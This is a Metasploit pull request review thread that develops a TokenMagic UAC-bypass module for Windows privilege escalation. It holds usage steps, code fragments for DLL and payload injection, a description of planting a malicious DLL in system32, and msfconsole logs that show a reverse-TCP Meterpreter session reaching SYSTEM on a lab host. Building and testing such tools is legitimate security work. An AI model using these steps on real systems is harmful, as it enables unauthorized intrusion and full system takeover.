Windows local TokenMagic exploit module
rapid7/metasploit-framework pull request #15168
Opened 2021-05-07 20:20 UTC by jheysel-r7

Currently WIP: Exploit module to leverage (TokenMagic)[https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1]

## Verification Steps
 1. Start msfconsole
 2. Get at least a user shell

Run the token magic exploit:
2. Do: `use exploit/windows/local/tokenmagic`
3. Set the `METHOD` of exploitation, either `DLL` or `SERVICE`
4. Set the `LHOST`, `SESSION` and `PAYLOAD` options
5. Do: `run`
6. You should get a shell, the exploitation process should be fairly instantaneous

2021-05-07 20:32 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +            'bwatters-r7' # msf module
And @jheysel-r7?

2021-05-07 20:43 UTC, bwatters-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +            'bwatters-r7' # msf module
Yes, very definitely!

2021-05-07 20:44 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +            'bwatters-r7' # msf module
Great work on this, you two!

2021-05-07 20:54 UTC, wvu-r7 commented
Jenkins, test this, please.

2021-05-10 14:37 UTC, smcintyre-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18362
I haven't tested this but the comment makes it sound like this should work on Windows 7 but the check appears to require Windows 10 build <= 16362. If Windows 7 is vulnerable then this should still return `CheckCode::Appears` but if the DLL technique leveraged means that our module only works on Windows 10 then the module should fail with `Failure::NoTarget`.

2021-05-10 15:02 UTC, bwatters-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18362
Yup; we need to figure out the check method; the service method should work with Win 7-10_1703.

2021-05-12 16:34 UTC, bwatters-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +vary for the DLL hijack trigger in earlier versions of Windows 10
Call out difference between overwrite supported targets and dll-hijack targets.

2021-05-12 16:34 UTC, bwatters-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> + 2. Get at least a user shell
Meterpreter session

2021-05-12 16:34 UTC, bwatters-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +        'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability',
Update name and description from the one I copy/pasta'd

2021-05-12 16:34 UTC, bwatters-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +
remove newline

2021-05-12 16:34 UTC, bwatters-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +
`else` here?  No reason to create the service exe if we're using the dll method.

2021-05-12 16:34 UTC, bwatters-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +
Prefer an else to an early return

2021-05-12 16:34 UTC, bwatters-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +      return Exploit::CheckCode::Appears if ((sysinfo_value =~ /10/ && build_num <= 17134) || build_num >= 7600 && build_num <= 9600)
`build_num >= 7600 && build_num <= 17134`?

2021-05-12 19:05 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +  prepend Msf::Exploit::Remote::AutoCheck
Dupe.

2021-05-12 19:09 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +                    [false, 'Service Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9).to_s]),
```suggestion
                    [false, 'Service Name to use (%RAND% by default).', Rex::Text.rand_text_alpha(5..9)]),
```

Already a string, I think. See other uses, too.

2021-05-12 19:09 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +      OptString.new('METHOD',
`OptEnum`, please.

2021-05-12 19:13 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +
This is still here. Reverting resolved.

2021-05-12 19:14 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    ::File.open(library_path, 'rb') { |f| dll = f.read }
Just use `File.read`, IMHO.

2021-05-12 19:17 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    end
```suggestion
    payload.arch.include?(ARCH_X64) ? ARCH_X64 : ARCH_X86
```

Maybe.

2021-05-12 19:19 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    end
This can probably be reworked to use "positive" logic.

2021-05-12 19:19 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    end
And elsewhere.

2021-05-12 19:20 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    else
I think your indentation is off starting here.

2021-05-12 19:23 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    print_status('Enjoy the shell!')
😎

2021-05-12 19:25 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
This is not `nil`-safe.

2021-05-12 19:26 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    return Exploit::CheckCode::Safe
https://github.com/rubocop/ruby-style-guide#explicit-return

If you want.

2021-05-12 19:27 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +      fail_with(Failure::BadConfig, 'Payload arch must match target arch')
```suggestion
      fail_with(Failure::NoTarget, 'Payload arch must match target arch')
```

2021-05-12 19:29 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    print_status('Trigger injected. Starting thread...')
```suggestion
    print_status('Trigger injected.')
    payload_mem = inject_into_process(process, payload.encoded)
    print_status('Payload injected. Starting thread...')
```

?

2021-05-12 19:30 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    print_status('Trigger injected. Starting thread...')
```suggestion
    exploit_mem, offset = inject_dll_data_into_process(process, dll)
    print_status('Trigger injected.')
    payload_mem = inject_into_process(process, payload.encoded)
    print_status('Payload injected. Starting thread...')
```

?

2021-05-12 19:32 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +      print_status("Payload DLL is #{payload.length} bytes long")
```suggestion
      vprint_status("Payload DLL is #{payload.length} bytes long")
```

?

2021-05-12 19:32 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    vprint_status('Checking Target')
```suggestion
    print_status('Checking Target')
```

?

2021-05-12 19:33 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    print_status('Enjoy the shell!')
```suggestion
    print_good('Enjoy the shell!')
```

2021-05-12 19:35 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    print_status('Trigger injected. Starting thread...')
```suggestion
    exploit_mem, offset = inject_dll_data_into_process(process, dll)
    print_good('Trigger injected.')
    payload_mem = inject_into_process(process, payload.encoded)
    print_good('Payload injected. Starting thread...')
```

?

2021-05-12 19:36 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +require 'msf/core/post/windows/powershell'
This is certainly required?

2021-05-12 19:37 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +  include Msf::Post::Windows::Powershell
Can you pare this down or reorder it?

2021-05-12 19:37 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +        'Name' => 'TokenMagic UAC Bypass',
Perhaps a more descriptive title.

2021-05-12 19:40 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +          are affected.
```suggestion
          This module leverages a UAC bypass (TokenMagic) in order to spawn a process with SYSTEM-level privileges or abuse a DLL
          hijacking vulnerability in order to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803
          are affected.
```

Grammar and capitalization. Reformat as you see fit.

2021-05-12 19:41 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +            'WfsDelay' => 900
What was the reason for this long timeout?

2021-05-12 19:43 UTC, wvu-r7 requested changes
Great job overall. Only a small handful of things to change.

2021-05-12 20:26 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +            'WfsDelay' => 900
The System Orchestrator service which loads the overwritten takes some time to trigger. More info can be found in the original module the trigger code was taken from:
https://github.com/jheysel-r7/metasploit-framework/blob/b4e2599921887e12a4da0dfb8be7db7ad2b4413b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md#L189

2021-05-12 20:29 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +            'WfsDelay' => 900
If that's the case, it's a good idea to warn the user why the exploit "hangs."

2021-05-12 21:50 UTC, bwatters-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    begin
I did not know we were making that officially a thing.  :sadpanda:

2021-05-12 22:04 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    begin
No hard rule on it yet, but we've been talking about it. The old RuboCop rules are due for a reevaluation, honestly. cc @adfoster-r7

To be clear, this is an _optional_ suggestion. Sometimes, it makes more sense to tighten the `begin` or leave it be.

2021-05-12 22:08 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +            'WfsDelay' => 900
And you can interpolate `wfs_delay` in the message, too.

2021-05-13 03:03 UTC, adfoster-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    begin
https://github.com/rapid7/metasploit-framework/pull/15192

2021-05-13 13:40 UTC, acammack-r7 commented on data/exploits/tokenmagic/tokenmagic.ps1
> +	}
Keep? Yeet?

2021-05-13 15:51 UTC, jheysel-r7 commented on data/exploits/tokenmagic/tokenmagic.ps1
> +	}
Yeeted

2021-05-13 16:17 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    else
It was, I think it got fixed when I refactored. Looking good now

2021-05-13 16:18 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
Good call, I've added a check for `build_num` before it gets used

2021-05-13 16:18 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    return Exploit::CheckCode::Safe
I want, thank you :)

2021-05-13 16:19 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +require 'msf/core/post/windows/powershell'
Tested without, module runs fine, removing.

2021-05-13 16:20 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +        'Name' => 'TokenMagic UAC Bypass',
I thought that was a bit bare, changed to `Windows Privilege Escalation via TokenMagic (UAC Bypass)` let me know if it could be improved further.

2021-05-13 16:33 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +            'WfsDelay' => 900
Added an explanation for the hang in the module's `method` argument description.

2021-05-13 19:40 UTC, wvu-r7 approved these changes
Didn't review the changes, but I trust you.

2021-05-13 22:57 UTC, gwillcox-r7 commented
@jheysel-r7 Fixed one instance of the `.to_s` bug @wvu-r7 mentioned, but there are still another 4 or so that need resolving beyond the one he reported. Mind fixing these?

2021-05-14 19:36 UTC, gwillcox-r7 requested changes

2021-05-14 19:36 UTC, gwillcox-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?
Won't this still throw an error if the file doesn't exist on disk though? As far as I can tell `exploit_data` doesn't actually have any handlers to handle the case where the file doesn't exist so I'm confused if this is a good check or not.

2021-05-14 19:36 UTC, gwillcox-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +      print_status('Executing ')
Executing what specifically? Can we be more specific here to help clarify things to end users? Also may want to remove the trailing whitespace here.

2021-05-14 19:36 UTC, gwillcox-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +      print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
```suggestion
      elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
      print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
```

2021-05-14 20:05 UTC, jheysel-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +hijacking method in this module relies on DLL that is only usable in Windows 1703 - 1803 and will not work on other
I looked into using other DLLs though we came to the decision that using WindowsCoreDeviceInfo.dll was sufficient as it worked on the most recent versions of Windows 10 that TokenMagic was applicable to.

2021-05-14 20:06 UTC, jheysel-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +   METHOD            SERVICE          yes       SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
Outdated. These changes were made in the following commit:
https://github.com/rapid7/metasploit-framework/pull/15168/commits/eab78853d0790c748b6944df9e609f5b8d0ee04d

2021-05-14 20:09 UTC, jheysel-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +[*] Payload DLL is 8704 bytes long
Outdated

2021-05-14 20:11 UTC, jheysel-r7 commented on data/exploits/tokenmagic/tokenmagic.ps1
> +		echo "[!] Failed impersonate context!`n"
None of the echo statements exist in the PowerShell script, they were removed in:
https://github.com/rapid7/metasploit-framework/pull/15168/commits/30857b0de63fcca22a0cf975d1651282fde42238

2021-05-14 20:13 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +                    [false, 'Filename for Service Payload (%RAND% by default).', Rex::Text.rand_text_alpha(5..9)]),
That makes sense, I'll change it "Random by default"

2021-05-14 20:13 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    print_good('Enjoy the shell!')
https://github.com/rapid7/metasploit-framework/pull/15168#discussion_r631375514

2021-05-14 20:14 UTC, wvu-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +      print_status('Executing ')
Unfinished thought. :joy:

2021-05-14 20:20 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +                    [false, 'Location of file to overwrite (%TEMP% by default).', nil]),
Updated

2021-05-14 20:21 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +  rescue Rex::Post::Meterpreter::RequestError
You're correct, this was changed in:
https://github.com/rapid7/metasploit-framework/pull/15168/commits/2a42f5d5af44586eeb4d1debd2bec83aeacaca95

2021-05-14 20:21 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    return process
I removed the implicit return as rubocop was complaining: 
this was changed in the following commit:
https://github.com/rapid7/metasploit-framework/pull/15168/commits/2a42f5d5af44586eeb4d1debd2bec83aeacaca95

2021-05-14 20:27 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +      print_status('Executing ')
Thanks! Updated

2021-05-14 20:39 UTC, jheysel-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?
Good call. If the file doesn't exist the module fails with the following:
`[-] Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /Users/jheysel/rapid7/metasploit-framework/data/exploits/tokenmagic/tokenmagic.ps1`

I'll remove the check

2021-05-14 20:51 UTC, jheysel-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +  `usoclient` to trigger the malicious dll with SYSTEM level privileges
Good called, changed to:
>  DLL mode: Using the elevated privileges from token magic the module will write a malicious file to c:\windows\system32\windowscoredeviceinfo.dll, a notepad.exe process is spawned and a DLL trigger is injected into the process to call the `usoclient`. When the `usoclient` runs it loads the the malicious DLL windowscoredeviceinfo.dll with SYSTEM level privileges.

2021-05-14 20:51 UTC, jheysel-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +2. Do: `use exploit/windows/local/tokenmagic`
Thanks for the tip! Fixed

2021-05-14 21:12 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +[*] Payload DLL is 8704 bytes long
Yep sorry thought I had removed all of these comments, this one slipped by for some reason. Apologies!

2021-05-14 21:14 UTC, gwillcox-r7 commented on data/exploits/tokenmagic/tokenmagic.ps1
> +		echo "[!] Failed impersonate context!`n"
Np, these comments were all mainly for the case where you still wanted to keep them in. Removing them was something I also considered as an option so agree these don't apply now that they have been removed.

2021-05-14 21:17 UTC, gwillcox-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +                    [false, 'Filename for Service Payload (%RAND% by default).', Rex::Text.rand_text_alpha(5..9)]),
Changes look good, marking as resolved.

2021-05-14 21:18 UTC, gwillcox-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +                    [false, 'Location of file to overwrite (%TEMP% by default).', nil]),
Looks much better, thanks for making this change!

2021-05-14 21:20 UTC, gwillcox-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    return process
Looks good now, thanks for fixing this! Marking as resolved 👍

2021-05-14 21:21 UTC, gwillcox-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +  rescue Rex::Post::Meterpreter::RequestError
Looks good, thanks for making this change! Marking as resolved 👍

2021-05-14 21:36 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +  `usoclient` to trigger the malicious dll with SYSTEM level privileges
`c:\windows\system32\windowscoredeviceinfo.dll` and `notepad.exe` should be in code here, as well as `windowscoredeviceinfo.dll`, but otherwise this looks very clean and well done, nice job!

2021-05-14 21:38 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +2. Do: `use exploit/windows/local/tokenmagic`
Indentation here is off which leads to an odd situation when previewing the markdown whereby the text isn't actually shown as a bullet point list. Here is my suggested fix:

```
1. Start msfconsole
2. Get a Meterpreter session
3. Do: `use exploit/windows/local/tokenmagic`
4. Set the `METHOD` of exploitation, either `DLL` or `SERVICE`
5. Set the `LHOST`, `SESSION` and `PAYLOAD` options
6. Do: `run`
7. You should get a shell, the exploitation process should be fairly instantaneous 
```

Put that all at the same indentation as your current `2. Get a Meterpreter Session` line.

2021-05-14 21:39 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +  Directory to write file to (%TEMP% by default).
```suggestion
  Directory to write file to (`%TEMP%` by default).
```

2021-05-14 21:42 UTC, gwillcox-r7 commented
Alright went through and verified that all the changes have been made correctly. The remaining ones that are open were either not resolved or need some minor adjustments to fix.

2021-05-14 21:45 UTC, gwillcox-r7 commented on modules/exploits/windows/local/tokenmagic.rb
> +    print_good('Enjoy the shell!')
This has since been fixed, see https://github.com/rapid7/metasploit-framework/pull/15168/files#diff-f463b0cf52a110eb2acf952c4c3de0bb5a611841850e48d925aa422eff2d58a8R186-R187 where a message is now printed out. Marking resolved.

2021-05-14 21:50 UTC, gwillcox-r7 commented
Going to go ahead and fix up the last issues so long seeing as they are relatively minor and easy to fix.

2021-05-14 22:02 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +  Directory to write file to (%TEMP% by default).
Fixed in https://github.com/rapid7/metasploit-framework/pull/15168/commits/8c3e35822e093b91503f98ddf66b4e6218fba083

2021-05-14 22:02 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +2. Do: `use exploit/windows/local/tokenmagic`
Fixed in https://github.com/rapid7/metasploit-framework/pull/15168/commits/8c3e35822e093b91503f98ddf66b4e6218fba083

2021-05-14 22:03 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/local/tokenmagic.md
> +  `usoclient` to trigger the malicious dll with SYSTEM level privileges
Fixed in https://github.com/rapid7/metasploit-framework/pull/15168/commits/8c3e35822e093b91503f98ddf66b4e6218fba083

2021-05-14 22:03 UTC, gwillcox-r7 approved these changes

2021-05-14 22:13 UTC, gwillcox-r7 commented
Tested exploit and it works like a charm on Windows 7 SP1 x64: 

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set RHOST 172.21.236.193
RHOST => 172.21.236.193
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.21.236.193   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.236.193:4444
[*] Sending stage (200262 bytes) to 172.21.236.193
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.21.236.193:4444) at 2021-05-14 17:11:17 -0500

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/tokenmagic 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set METHOD SERVICE
METHOD => SERVICE
msf6 exploit(windows/local/tokenmagic) > set LHOST 172.21.225.155
LHOST => 172.21.225.155
msf6 exploit(windows/local/tokenmagic) > set SESSION 1 
SESSION => 1
msf6 exploit(windows/local/tokenmagic) > exploit

[*] Started reverse TCP handler on 172.21.225.155:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Checking Target
[*] Attempting to PrivEsc on TEST-PC via session ID: 1
[*] Uploading payload to C:\Users\test\AppData\Local\Temp\AcStjkf.exe
[*] Running Exploit on TEST-PC
[*] Executing TokenMagic PowerShell script
[+] Enjoy the shell!
[*] Sending stage (200262 bytes) to 172.21.236.193
[+] Deleted C:\Users\test\AppData\Local\Temp\AcStjkf.exe
[*] Meterpreter session 2 opened (172.21.225.155:4444 -> 172.21.236.193:49182) at 2021-05-14 17:12:12 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/local/tokenmagic) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x64/windows  test-PC\test @ TEST-PC         0.0.0.0:0 -> 172.21.236.193:4444 (172.21.236.193)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TEST-PC  172.21.225.155:4444 -> 172.21.236.193:49182 (172.21.236.193)

msf6 exploit(windows/local/tokenmagic) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/local/tokenmagic) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > 
```

2021-05-14 22:17 UTC, gwillcox-r7 commented
Only thing I will say is that right now if you try run the DLL method on a target that doesn't support the DLL hijacking technique you end up incorrectly labeling the target as not vulnerable without properly explaining that the real issue is that the DLL hijacking technique doesn't work on that target:

```
msf6 exploit(windows/local/tokenmagic) > set METHOD DLL
METHOD => DLL
msf6 exploit(windows/local/tokenmagic) > show options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            DLL              yes       SERVICE or DLL, please select which attack method you would like to use (SERVICE
                                                by default).
Note that the System Orchestrator service which loads the overwritte
                                                n DLL when using the DLL method can take up to 10
minutes to trigger (Accepted: S
                                                ERVICE, DLL)
   SERVICE_FILENAME  AcStjkf          no        Filename for Service Payload (Random by default).
   SERVICE_NAME      DMwhByvhi        no        Service Name to use (Random by default).
   SESSION           1                yes       The session to run this module on.
   WRITABLE_DIR                       no        Directory to write file to (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.21.225.155   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > exploit

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/tokenmagic) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/tokenmagic) > exploit

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/tokenmagic) > set SESSION 3 
SESSION => 3
msf6 exploit(windows/local/tokenmagic) > exploit

[*] Started reverse TCP handler on 172.21.225.155:4444 
[*] Executing automatic check (disable AutoCheck to override)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/tokenmagic) > 
```

2021-05-14 22:33 UTC, gwillcox-r7 commented
With the latest fixes the scenario now is more intuitive to end users and will instead result in the following output (VERBOSE mode turned on for extra clarity):

```
msf6 exploit(windows/local/tokenmagic) > check

[*] Target's build number: 7601
[*] Build Number = 7601
[-] The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!
[*] The target is not exploitable.
msf6 exploit(windows/local/tokenmagic) > 
```

2021-05-14 22:48 UTC, gwillcox-r7 commented
Squashed commits as 41 commits was a lot of commits and most were in relation to fixing existing review comments.

2021-05-15 02:53 UTC, merged

2021-05-15 03:03 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added to exploit TokenMagic, an exploitation technique that works on Windows 7 to Windows 10 build 17134 inclusive, that allows users to elevate their privileges to SYSTEM. Affected systems can be exploited either via exploiting a DLL hijacking vulnerability affecting Windows 10 build 15063 up to build 17134 inclusive, or by creating a new service on the target system.